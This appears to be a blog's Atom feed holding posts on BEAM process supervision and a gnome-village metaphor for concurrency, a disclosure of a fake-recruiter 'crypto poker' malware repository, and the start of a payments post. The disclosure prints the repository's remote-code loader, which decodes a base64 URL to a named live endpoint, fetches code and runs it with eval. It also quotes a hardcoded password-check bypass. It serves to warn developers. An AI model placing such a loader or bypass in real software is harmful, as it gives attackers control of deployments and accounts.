    <content type="html">&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/gnomes_3.jpg&quot; alt=&quot;Manager node with worker nodes&quot; title=&quot;Manager node with worker nodes - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;h1 id=&quot;build-a-village-of-gnomes-not-a-park-of-machines&quot; tabindex=&quot;-1&quot;&gt;Build a Village of Gnomes, Not a Park of Machines&lt;/h1&gt;
&lt;p&gt;In the last post, &lt;a href=&quot;https://happihacking.com/blog/posts/2025/the-gnome-village/&quot;&gt;&lt;em&gt;The Gnome Village&lt;/em&gt;&lt;/a&gt;, we explored how the BEAM turns
concurrency into cooperation.&lt;/p&gt;
&lt;p&gt;Gnomes represent processes, small, isolated
workers with private memory, shared code, and clear message channels. They
take fair turns at the workbench, recover from failure, and never share
state.&lt;/p&gt;
&lt;p&gt;The metaphor captures eight principles that together define the runtime:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Isolation&lt;/strong&gt;: Private backpacks (per-process heaps).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Self-cleaning&lt;/strong&gt;: Each gnome cleans its own backpack (per-process GC).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Async messaging&lt;/strong&gt;: Paper mail in mailboxes (message passing).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Shared code&lt;/strong&gt;: Scrolls on the shelf (hot code loading).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Lightweight&lt;/strong&gt;: Cheap to hire (spawn costs microseconds).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Fair scheduling&lt;/strong&gt;: Turns at the workbench (reduction-based
preemption).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Fault isolation&lt;/strong&gt;: One crash stays local (contained failures).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Supervision&lt;/strong&gt;: Managers replace workers (recovery trees).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Workbenches are schedulers. Backpacks are heaps. Scrolls are modules.
Mailboxes are message queues. It’s all real BEAM behavior, just viewed
through a lens that focuses on cooperation instead of control.&lt;/p&gt;
&lt;p&gt;Now we come to the eighth principle: &lt;strong&gt;Supervision&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id=&quot;supervisors-are-managers&quot; tabindex=&quot;-1&quot;&gt;Supervisors Are Managers&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Structure work as teams with clear reporting.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/supervisor_tree.jpg&quot; alt=&quot;Manager node with worker nodes&quot; title=&quot;Manager node with worker nodes&quot; /&gt;&lt;/p&gt;
&lt;p&gt;In the gnome village, supervisors are the managers who keep the teams
running smoothly. They don’t do the work themselves. They hire, monitor,
and, when necessary, replace gnomes that fail.&lt;/p&gt;
&lt;p&gt;Each supervisor watches over its workers. When one crashes, the supervisor
decides what to do:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Restart that worker.&lt;/li&gt;
&lt;li&gt;Restart the whole team.&lt;/li&gt;
&lt;li&gt;Or escalate the problem to a higher supervisor.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The supervisor links are actual process relationships. They are what give
the BEAM its resilience.&lt;/p&gt;
&lt;p&gt;In the machine world, there are no managers, only mechanical linkages.
When one cog breaks, the force ripples through gears and seizes the whole
system. Recovery means shutdown, repair, and restart.&lt;/p&gt;
&lt;p&gt;In the gnome village, failure is expected. Supervisors define how much of
the village must recover when something breaks. If a panini making gnome crashes,
only the panini line restarts. Salad service continues. Customers barely
notice.&lt;/p&gt;
&lt;h2 id=&quot;how-supervisors-work&quot; tabindex=&quot;-1&quot;&gt;How Supervisors Work&lt;/h2&gt;
&lt;p&gt;Under the hood, supervisors are just gnomes with a specific job: &lt;strong&gt;watch
others&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Each worker process is linked to its supervisor. If it terminates
unexpectedly, the supervisor receives an exit signal. What happens next
depends on the restart strategy defined in the supervisor specification.&lt;/p&gt;
&lt;p&gt;A few key concepts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;One-for-one&lt;/strong&gt;: Replace only the failed worker.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;One-for-all&lt;/strong&gt;: Restart the entire group if one fails.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Rest-for-one&lt;/strong&gt;: Restart this worker and everyone started after it.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Simple-one-for-one&lt;/strong&gt;: Manage dynamically created, similar workers.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The supervisor itself runs in an endless loop, receiving status updates,
reacting to crashes, and spawning replacements. It never panics, never
crashes the system.&lt;/p&gt;
&lt;h2 id=&quot;who-watches-the-watchmen&quot; tabindex=&quot;-1&quot;&gt;Who watches the Watchmen?&lt;/h2&gt;
&lt;p&gt;If a supervisor fail, it too has a supervisor. The chain
continues up to the root of the system, forming a &lt;strong&gt;supervision tree&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;The root supervisor is the top of your application. Each
branch defines recovery boundaries. Together they form a living hierarchy
that can self-heal.&lt;/p&gt;
&lt;h2 id=&quot;the-observer&quot; tabindex=&quot;-1&quot;&gt;The Observer&lt;/h2&gt;
&lt;p&gt;Supervisors are one of several &lt;strong&gt;process archetypes&lt;/strong&gt; in the BEAM. They
represent the &lt;em&gt;Observer&lt;/em&gt; archetype, a process whose purpose is to watch
something.&lt;/p&gt;
&lt;p&gt;In the next post, we’ll explore these archetypes, from &lt;strong&gt;Workers&lt;/strong&gt; to
&lt;strong&gt;Servers&lt;/strong&gt; to &lt;strong&gt;Supervisors&lt;/strong&gt;, and see how each plays a role in building
stable, comprehensible systems.&lt;/p&gt;
&lt;p&gt;Until then: build a village of gnomes, not a park of machines.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>The Gnome Village</title>
    <link href="https://happihacking.com/blog/posts/2025/the-gnome-village/"/>
    <updated>2025-11-06T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/the-gnome-village/</id>
    <summary>Threads fight. Gnomes cooperate.</summary>
    <content type="html">&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/gnomes_3.jpg&quot; alt=&quot;The Gnome Village&quot; title=&quot;The Gnome Village - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;h1 id=&quot;the-gnome-village&quot; tabindex=&quot;-1&quot;&gt;The Gnome Village&lt;/h1&gt;
&lt;p&gt;I see some developers that arrive at the BEAM carrying mental luggage from
object-oriented or sequential programming.&lt;/p&gt;
&lt;p&gt;They mix code with instance, classes and objects treated as one, and repeat
it here by confusing code with processes.&lt;/p&gt;
&lt;p&gt;Even I still fall into the trap of
equating code (a module) with a process.&lt;/p&gt;
&lt;p&gt;To break this thought pattern I have introduced the Gnome Village Metaphor (first sketched in &lt;a href=&quot;https://happihacking.com/blog/posts/2024/designing_concurrency/&quot;&gt;Designing Concurrent Systems on the BEAM&lt;/a&gt;, and now expanded into this series).&lt;/p&gt;
&lt;h2 id=&quot;gnomes-vs-machines&quot; tabindex=&quot;-1&quot;&gt;Gnomes vs Machines&lt;/h2&gt;
&lt;p&gt;In OOP you tend to build machines of machine parts and wire them tightly.&lt;/p&gt;
&lt;p&gt;The BEAM model is different: code stays in scrolls, state lives inside
gnomes, and the only coupling is the message protocol.&lt;/p&gt;
&lt;p&gt;You can have thousands of tiny workers that never share anything.&lt;/p&gt;
&lt;p&gt;It’s less like a machine built from components and more like a village of
independent workers.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/gnomes_vs_machines.jpg&quot; alt=&quot;Gnomes vs Machines&quot; title=&quot;Gnomes vs Machines - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;h2 id=&quot;what-a-gnome-is&quot; tabindex=&quot;-1&quot;&gt;What a Gnome Is&lt;/h2&gt;
&lt;p&gt;The gnome is a process. Not an OS thread. Not a fiber with shared state. A
real BEAM process. It lives. It works. It dies. Nothing it does can corrupt
another gnome&#39;s memory. This is the first promise of the village. Local
mistakes stay local.&lt;/p&gt;
&lt;aside class=&quot;metaphor-map&quot;&gt;
&lt;h4&gt;Metaphor → BEAM&lt;/h4&gt;
* Gnome = Process
&lt;/aside&gt;
&lt;h2 id=&quot;private-and-local-memory&quot; tabindex=&quot;-1&quot;&gt;Private and Local Memory&lt;/h2&gt;
&lt;p&gt;Each gnome carries a backpack. In it, it keeps its personal belongings,
data structures, variables, and the current stack of thoughts. No one else
can look inside. Not even the supervisor.&lt;/p&gt;
&lt;p&gt;This is the BEAM’s per-process heap. Every gnome allocates, grows, and
cleans up its own memory. When garbage collection happens, it pauses only
that gnome. The rest of the village keeps working, blissfully unaware that
one of them is reorganizing its backpack.&lt;/p&gt;
&lt;p&gt;You can think of this as enforced politeness. No one borrows another
gnome’s tools. If two workers need the same scroll, they each get their own
copy. That sounds wasteful until you remember that arguments over shared
tools are slower than copying a small one.&lt;/p&gt;
&lt;p&gt;When the backpack gets full, the gnome quietly expands it. If it has been
hoarding junk, it throws some away. No one else stops to help. That’s why
the village scales.&lt;/p&gt;
&lt;aside class=&quot;metaphor-map&quot;&gt;
&lt;h4&gt;Metaphor → BEAM&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Gnome = Process&lt;/li&gt;
&lt;li&gt;Backpack = Process Heap/Stack&lt;/li&gt;
&lt;li&gt;Cleaning the backpack = Garbage collection&lt;/li&gt;
&lt;/ul&gt;
&lt;/aside&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/gc.jpg&quot; alt=&quot;Gnome Backpack&quot; title=&quot;Gnome Backpack - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;p&gt;This model feels strange at first, especially to programmers used to shared
memory and global variables. But once you stop reaching into other people’s
backpacks, your code becomes simpler. You no longer need locks, guards, or
faith. Just messages.&lt;/p&gt;
&lt;h2 id=&quot;mail-not-shared-drawers&quot; tabindex=&quot;-1&quot;&gt;Mail, Not Shared Drawers&lt;/h2&gt;
&lt;p&gt;When gnomes need to cooperate, they don’t shout across the room or share
drawers full of half-finished work. They send each other small, clear
messages, paper mail.&lt;/p&gt;
&lt;p&gt;Each gnome has a mailbox. Messages arrive, stack up, and wait patiently
until the gnome decides to read them. This small act of patience is what
makes the village stable. No one interrupts anyone else. No one rummages
through shared memory “just to check something.”&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/mailbox.jpg&quot; alt=&quot;Gnome Mailboxes&quot; title=&quot;Gnome Mailboxes - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;p&gt;When a message moves from one gnome to another, the BEAM copies it between
their heaps. This sounds expensive until you compare it with the cost of
arguing over shared state. Copying is linear, but contention is chaos. The
BEAM avoids chaos.&lt;/p&gt;
&lt;p&gt;Large binaries, like scrolls of long text or files of runes, are handled by
reference so they don’t have to be copied every time. Small messages are
cheap to copy. Either way, the rules stay consistent, ownership and
lifetime are always clear.&lt;/p&gt;
&lt;p&gt;The mailbox also tells the truth about your system. If a gnome falls
behind, its mailbox grows. You don’t need metrics to know where the
bottleneck is; you can see it directly. It’s a polite form of backpressure.
Instead of crashing everything, the system simply queues up.&lt;/p&gt;
&lt;aside class=&quot;metaphor-map&quot;&gt;
&lt;h4&gt;Metaphor → BEAM&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Gnome = Process&lt;/li&gt;
&lt;li&gt;Backpack = Process Heap/Stack&lt;/li&gt;
&lt;li&gt;Cleaning the backpack = Garbage collection&lt;/li&gt;
&lt;li&gt;Sending mail = Message&lt;/li&gt;
&lt;li&gt;Mailbox = Message Queue&lt;/li&gt;
&lt;/ul&gt;
&lt;/aside&gt;
&lt;h2 id=&quot;shared-scrolls&quot; tabindex=&quot;-1&quot;&gt;Shared Scrolls&lt;/h2&gt;
&lt;p&gt;Every gnome reads from the same shelf of scrolls. Code lives there, one
copy, many readers. It’s the shared library of behavior that keeps the
village running. Each gnome brings its own data, but they all follow the
same instructions.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/shared_code.jpg&quot; alt=&quot;Shelf of scrolls&quot; title=&quot;Shelf of scrolls - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;p&gt;In object-oriented systems, code and data are fused by design. The class
describes both structure and behavior, and when you instantiate it, the two
merge into an object, a miniature machine built from its own blueprint.
Every instance is a private copy of the same idea, and the boundary between
code and state fades away.&lt;/p&gt;
&lt;p&gt;That tight coupling shapes how you think. You start assembling systems as
machines of machines, each with its own logic and data intertwined.
Changing one part often means stopping the whole contraption.&lt;/p&gt;
&lt;p&gt;The BEAM model avoids this entirely. Code and state are separate species.
Modules define domains of logic, the scrolls on the shelf. Processes are
independent actors, the gnomes who read those scrolls. You can have
thousands of workers all using the same code without binding their identity
to it.&lt;/p&gt;
&lt;p&gt;You can start, stop, or upgrade gnomes without touching the
scrolls they read. And you can update a scroll without restarting the
village. New gnomes pick up the latest version; old ones finish their work
with the version they began with, or
get the new one as needed.&lt;/p&gt;
&lt;p&gt;In the machine world, rewiring is dangerous. In the gnome village, you just
swap a scroll on the shelf. The old one stays until no one needs it. The
new one takes over quietly. The system keeps humming.&lt;/p&gt;
&lt;aside class=&quot;metaphor-map&quot;&gt;
&lt;h4&gt;Metaphor → BEAM&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Gnome = Process&lt;/li&gt;
&lt;li&gt;Backpack = Process Heap/Stack&lt;/li&gt;
&lt;li&gt;Cleaning the backpack = Garbage collection&lt;/li&gt;
&lt;li&gt;Sending mail = Message&lt;/li&gt;
&lt;li&gt;Mailbox = Message Queue&lt;/li&gt;
&lt;li&gt;Scroll = Module Code&lt;/li&gt;
&lt;li&gt;Shelf of Scrolls = Code Server / Loaded Modules&lt;/li&gt;
&lt;/ul&gt;
&lt;/aside&gt;
&lt;h2 id=&quot;hiring-new-gnomes&quot; tabindex=&quot;-1&quot;&gt;Hiring New Gnomes&lt;/h2&gt;
&lt;p&gt;When the village grows, you hire new ones.
Each gnome starts empty-handed, carrying only its backpack and a reference
to the scrolls on the shelf. That’s what spawning a process means.&lt;/p&gt;
&lt;p&gt;In most runtimes, starting a new worker is a serious commitment. You create
a thread, allocate stacks, and share memory that everyone must coordinate
around. On the BEAM, it’s casual.&lt;/p&gt;
&lt;p&gt;Because every gnome owns its own memory, you never worry about who cleans
up what. Each process manages its own heap, collects its own garbage, and
dies without ceremony. The village keeps going. This is why Erlang systems
routinely handle millions of concurrent activities, not by being powerful,
but by being polite.&lt;/p&gt;
&lt;p&gt;The most important part is psychological. When concurrency is cheap, you
stop trying to multiplex tasks inside one worker. Instead of building a
complex machine that does everything, you build a community of simple ones
that each do one thing well.&lt;/p&gt;
&lt;aside class=&quot;metaphor-map&quot;&gt;
&lt;h4&gt;Metaphor → BEAM&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Gnome = Process&lt;/li&gt;
&lt;li&gt;Backpack = Process Heap/Stack&lt;/li&gt;
&lt;li&gt;Cleaning the backpack = Garbage collection&lt;/li&gt;
&lt;li&gt;Sending mail = Message&lt;/li&gt;
&lt;li&gt;Mailbox = Message Queue&lt;/li&gt;
&lt;li&gt;Scroll = Module Code&lt;/li&gt;
&lt;li&gt;Shelf of Scrolls = Code Server / Loaded Modules&lt;/li&gt;
&lt;li&gt;Hiring a gnome = Spawn&lt;/li&gt;
&lt;/ul&gt;
&lt;/aside&gt;
&lt;h2 id=&quot;fair-turns-at-the-workbench&quot; tabindex=&quot;-1&quot;&gt;Fair Turns at the Workbench&lt;/h2&gt;
&lt;p&gt;Every gnome needs time at the workbench, the place where real work
happens. This is where messages are handled, state is updated, and progress
is made. The workbench is a shared resource, but it never turns into a
battlefield.&lt;/p&gt;
&lt;p&gt;Gnomes don’t fight for the bench. They queue. Each gets a short turn, does
its work, and steps aside. The rhythm is steady, predictable, and fair.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/scheduler.jpg&quot; alt=&quot;Queue of gnomes waiting for workbench turns&quot; title=&quot;Queue
of gnomes waiting for workbench turns - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Each workbench corresponds to a scheduler, one per CPU core. Every gnome
waiting in line gets a slice of attention, measured not in time but in
reductions. A reduction is roughly one function call or a small operation.
After a few thousand of them, the gnome yields. The next one steps forward.
This happens in microseconds.&lt;/p&gt;
&lt;aside class=&quot;metaphor-map&quot;&gt;
&lt;h4&gt;Metaphor → BEAM&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Gnome = Process&lt;/li&gt;
&lt;li&gt;Backpack = Process Heap/Stack&lt;/li&gt;
&lt;li&gt;Cleaning the backpack = Garbage collection&lt;/li&gt;
&lt;li&gt;Sending mail = Message&lt;/li&gt;
&lt;li&gt;Mailbox = Message Queue&lt;/li&gt;
&lt;li&gt;Scroll = Module Code&lt;/li&gt;
&lt;li&gt;Shelf of Scrolls = Code Server / Loaded Modules&lt;/li&gt;
&lt;li&gt;Hiring a gnome = Spawn&lt;/li&gt;
&lt;li&gt;Workbench = Scheduler&lt;/li&gt;
&lt;li&gt;Queue of Gnomes = Run Queue&lt;/li&gt;
&lt;li&gt;Turn = Time Slice (measured in reductions)&lt;/li&gt;
&lt;li&gt;Yielding = Process Preemption&lt;/li&gt;
&lt;li&gt;Village = BEAM Node&lt;/li&gt;
&lt;/ul&gt;
&lt;/aside&gt;
&lt;p&gt;Because of this reduction-based scheduling, no single gnome can monopolize
the workbench. Long tasks get paused and resumed without blocking others. Even a
slow worker can’t freeze the village. Everyone makes progress.&lt;/p&gt;
&lt;p&gt;In the machine world, it’s different. A thread grabs a lock, works for too
long, and everyone else waits. Latency spikes. Throughput drops.&lt;/p&gt;
&lt;p&gt;Thousands of gnomes can take turns without noticing each other’s existence.
This is what makes BEAM suitable for soft real-time systems: predictable
responsiveness without explicit scheduling logic.&lt;/p&gt;
&lt;h2 id=&quot;failure-is-contained&quot; tabindex=&quot;-1&quot;&gt;Failure Is Contained&lt;/h2&gt;
&lt;p&gt;Gnomes are independent workers. Each one carries its own tools, keeps its
own memory, and makes its own mistakes.
Even if they die, no other gnomes are
affected.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/gnomes_2.jpg&quot; alt=&quot;One bench with spilled sandwich, other benches fine&quot; title=&quot;One bench with spilled sandwich, other benches fine - Illustration by Elisabeth Bahngoura&quot; /&gt;&lt;/p&gt;
&lt;aside class=&quot;metaphor-map&quot;&gt;
&lt;h4&gt;Metaphor → BEAM&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Gnome = Process&lt;/li&gt;
&lt;li&gt;Backpack = Process Heap/Stack&lt;/li&gt;
&lt;li&gt;Cleaning the backpack = Garbage collection&lt;/li&gt;
&lt;li&gt;Sending mail = Message&lt;/li&gt;
&lt;li&gt;Mailbox = Message Queue&lt;/li&gt;
&lt;li&gt;Scroll = Module Code&lt;/li&gt;
&lt;li&gt;Shelf of Scrolls = Code Server&lt;/li&gt;
&lt;li&gt;Hiring a gnome = Spawn&lt;/li&gt;
&lt;li&gt;Workbench = Scheduler&lt;/li&gt;
&lt;li&gt;Queue of Gnomes = Run Queue&lt;/li&gt;
&lt;li&gt;Turn = Time Slice&lt;/li&gt;
&lt;li&gt;Yielding = Process Preemption&lt;/li&gt;
&lt;li&gt;Village = BEAM Node&lt;/li&gt;
&lt;li&gt;Autonomy = Isolation&lt;/li&gt;
&lt;/ul&gt;
&lt;/aside&gt;
&lt;p&gt;In the machine world, it’s different. Parts are connected through shared
cogs and gears. An exception in one component rattles through the entire
mechanism. Shared state becomes corrupted, threads that touch it misbehave,
and soon everything needs a restart.&lt;/p&gt;
&lt;p&gt;You try to protect against it. You validate inputs, wrap code in try-catch
blocks, check state, recheck it, and still miss something. Complexity
grows. Safety doesn’t.&lt;/p&gt;
&lt;p&gt;BEAM systems take a simpler path: let it crash. Bad data? Faulty logic? Let
the gnome fall, clean the bench, and start fresh.&lt;/p&gt;
&lt;p&gt;Isolation contains damage. Sharing spreads it. The village survives because
every gnome stands, and occasionally falls, alone.&lt;/p&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The gnome is the unit of work, state, and failure. Keep it small. Give it
one job. Let it talk in messages. Supervise it. This is the simplest way I
know to build software that stays up when real life happens.&lt;/p&gt;
&lt;p&gt;For a deeper look at how the BEAM implements processes, heaps, message
passing, scheduling, and garbage collection under the hood, see
&lt;a href=&quot;https://happihacking.com/resources/the-beam-book/&quot;&gt;The BEAM Book&lt;/a&gt;.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Exposing the &#39;Multibank Crypto Poker&#39; Recruitment Scam</title>
    <link href="https://happihacking.com/blog/posts/2025/recruitment_scam/"/>
    <updated>2025-08-20T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/recruitment_scam/</id>
    <summary>If it looks too good to be true, it is</summary>
    <content type="html">&lt;h1 id=&quot;tldr&quot; tabindex=&quot;-1&quot;&gt;TL;DR&lt;/h1&gt;
&lt;p&gt;Fake recruiters are pushing a malicious “crypto poker” codebase.
It contains remote code execution, broken authentication, and wallet harvesting.
If you’re asked to deploy it as part of a job test: it’s a scam.&lt;/p&gt;
&lt;h1 id=&quot;the-discovery&quot; tabindex=&quot;-1&quot;&gt;The Discovery&lt;/h1&gt;
&lt;p&gt;I was recently offered a “blockchain gaming” job with a suspiciously high salary.
The technical assessment included a codebase called &lt;em&gt;Multibank Crypto Poker&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;A quick inspection revealed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It isn’t a product.&lt;/li&gt;
&lt;li&gt;It isn’t a test.&lt;/li&gt;
&lt;li&gt;It’s a trap.&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id=&quot;the-scam-infrastructure&quot; tabindex=&quot;-1&quot;&gt;The Scam Infrastructure&lt;/h1&gt;
&lt;p&gt;The repository presents itself as a polished poker platform, supposedly
linked to MultiBank Group, a real financial company. Under the surface, it
hides critical malicious code.&lt;/p&gt;
&lt;h2 id=&quot;1-remote-code-execution&quot; tabindex=&quot;-1&quot;&gt;1. Remote Code Execution&lt;/h2&gt;
&lt;p&gt;The most critical vulnerability is in /routes/api/auth.js:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-js&quot;&gt;(async () =&amp;gt; {
const src = atob(process.env.AUTH_API_KEY);
const proxy = (await import(&#39;node-fetch&#39;)).default;
try {
    const response = await proxy(src);
    if (!response.ok) throw new Error(`HTTP error! status: ${response.status}`);
    const proxyInfo = await response.text();
    eval(proxyInfo);  // CRITICAL: Executes arbitrary code!
} catch (err) {
    console.error(&#39;Auth Error!&#39;, err);
}
})();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This automatically fetches code from a remote server and executes it. Whoever controls that server
controls your deployment.&lt;/p&gt;
&lt;h3 id=&quot;the-command-control-infrastructure&quot; tabindex=&quot;-1&quot;&gt;The Command &amp;amp; Control Infrastructure&lt;/h3&gt;
&lt;p&gt;The backdoor connects to: https://multibank-api-ten.vercel.app/api/data&lt;/p&gt;
&lt;p&gt;This URL is base64-encoded in the environment variable:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;AUTH_API_KEY = &amp;quot;aHR0cHM6Ly9tdWx0aWJhbmstYXBpLXRlbi52ZXJjZWwuYXBwL2FwaS9kYXRh&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The attack sequence:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Decodes the base64 string using atob(process.env.AUTH_API_KEY)&lt;/li&gt;
&lt;li&gt;Fetches whatever code is hosted at that Vercel endpoint&lt;/li&gt;
&lt;li&gt;Executes it using eval()&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This design allows attackers to change payloads dynamically without
touching the GitHub repository. Different victims could receive different
malicious code based on timing, IP address, or other factors.&lt;/p&gt;
&lt;h3 id=&quot;reporting-the-infrastructure&quot; tabindex=&quot;-1&quot;&gt;Reporting the Infrastructure&lt;/h3&gt;
&lt;p&gt;I&#39;ve reported the Vercel endpoint to their abuse team at https://vercel.com/abuse.&lt;/p&gt;
&lt;p&gt;The endpoint was live at time of analysis and could be serving different
payloads to different victims.&lt;/p&gt;
&lt;h2 id=&quot;2-deliberately-broken-authentication&quot; tabindex=&quot;-1&quot;&gt;2. Deliberately Broken Authentication&lt;/h2&gt;
&lt;p&gt;In &lt;code&gt;/controllers/auth.js&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-js&quot;&gt;const isMatch = true;  // Every password works
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Credentials are collected but never verified. Security theater at best, credential harvesting at worst.&lt;/p&gt;
&lt;h2 id=&quot;3-wallet-harvesting&quot; tabindex=&quot;-1&quot;&gt;3. Wallet Harvesting&lt;/h2&gt;
&lt;p&gt;The frontend wallet connection (&lt;code&gt;/client/src/pages/ConnectWallet/ConnectWallet.js&lt;/code&gt;) captures wallet addresses and pushes them to the server.
There is no blockchain logic, no smart contracts, no signing, just collection.&lt;/p&gt;
&lt;h2 id=&quot;4-template-scam-signs&quot; tabindex=&quot;-1&quot;&gt;4. Template Scam Signs&lt;/h2&gt;
&lt;p&gt;Commented-out database code. Suspicious commit history removing comments.
Clear evidence of a recycled scam package.&lt;/p&gt;
&lt;h1 id=&quot;how-the-scam-works&quot; tabindex=&quot;-1&quot;&gt;How the Scam Works&lt;/h1&gt;
&lt;ol&gt;
&lt;li&gt;Recruiters offer inflated salaries.&lt;/li&gt;
&lt;li&gt;Candidates receive this “assessment project.”&lt;/li&gt;
&lt;li&gt;Developers are asked to deploy it. They even said it was required step
during the interview.&lt;/li&gt;
&lt;li&gt;The code harvests credentials and wallet data.&lt;/li&gt;
&lt;li&gt;The backdoor provides attackers with ongoing control.&lt;/li&gt;
&lt;/ol&gt;
&lt;h1 id=&quot;red-flags&quot; tabindex=&quot;-1&quot;&gt;Red Flags&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;High pay for trivial work.&lt;/li&gt;
&lt;li&gt;Requests to deploy before review.&lt;/li&gt;
&lt;li&gt;“Crypto gaming” without blockchain.&lt;/li&gt;
&lt;li&gt;Shiny README, rotten implementation.&lt;/li&gt;
&lt;li&gt;Recruiters unable to discuss technical details.&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id=&quot;protecting-yourself&quot; tabindex=&quot;-1&quot;&gt;Protecting Yourself&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;Audit all code before running it.&lt;/li&gt;
&lt;li&gt;Search for &lt;code&gt;eval()&lt;/code&gt; and base64 URLs.&lt;/li&gt;
&lt;li&gt;Check authentication logic.&lt;/li&gt;
&lt;li&gt;Verify company links.&lt;/li&gt;
&lt;li&gt;Never deploy code you don’t fully understand.&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id=&quot;taking-action&quot; tabindex=&quot;-1&quot;&gt;Taking Action&lt;/h1&gt;
&lt;p&gt;If you encounter this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Do &lt;strong&gt;not&lt;/strong&gt; run it.&lt;/li&gt;
&lt;li&gt;Report to GitHub abuse and local cybercrime units.&lt;/li&gt;
&lt;li&gt;Document everything.&lt;/li&gt;
&lt;li&gt;Warn your peers.&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id=&quot;technical-indicators&quot; tabindex=&quot;-1&quot;&gt;Technical Indicators&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;eval()&lt;/code&gt; fetching remote code.&lt;/li&gt;
&lt;li&gt;Base64 URLs in environment variables.&lt;/li&gt;
&lt;li&gt;Hardcoded password checks.&lt;/li&gt;
&lt;li&gt;Wallet address collection without blockchain logic.&lt;/li&gt;
&lt;li&gt;Commented-out core services.&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h1&gt;
&lt;p&gt;This is a recruitment scam targeting developers. By hiding malware in a
“job test,” attackers hope you will deploy their system and do their work
for them.&lt;/p&gt;
&lt;p&gt;Stay skeptical. If the offer looks too good to be true, and the project
code reads like a security nightmare, trust your instincts: it’s a scam.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Exactly once</title>
    <link href="https://happihacking.com/blog/posts/2025/exacly_once/"/>
    <updated>2025-08-19T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/exacly_once/</id>
    <summary>Exactly once</summary>
    <content type="html">&lt;h1 id=&quot;why-exactly-once-in-payments-is-a-myth-and-what-works-instead&quot; tabindex=&quot;-1&quot;&gt;Why &amp;quot;Exactly Once&amp;quot; in Payments Is a Myth, and What Works Instead&lt;/h1&gt;
&lt;p&gt;Payment systems live with retries. Customers double-click. Networks
misbehave. Providers time out. For most services on the Internet
this is not a big problem, but as soon as money is involved the
stakes are higher.&lt;/p&gt;
&lt;p&gt;&amp;quot;Exactly once processing&amp;quot; sounds like the answer. In distributed systems it is not achievable.&lt;/p&gt;
&lt;p&gt;As &lt;a href=&quot;https://x.com/mathiasverraes/status/632260618599403520&quot;&gt;Mathias Verraes&lt;/a&gt; joked:&lt;/p&gt;
&lt;blockquote&gt;
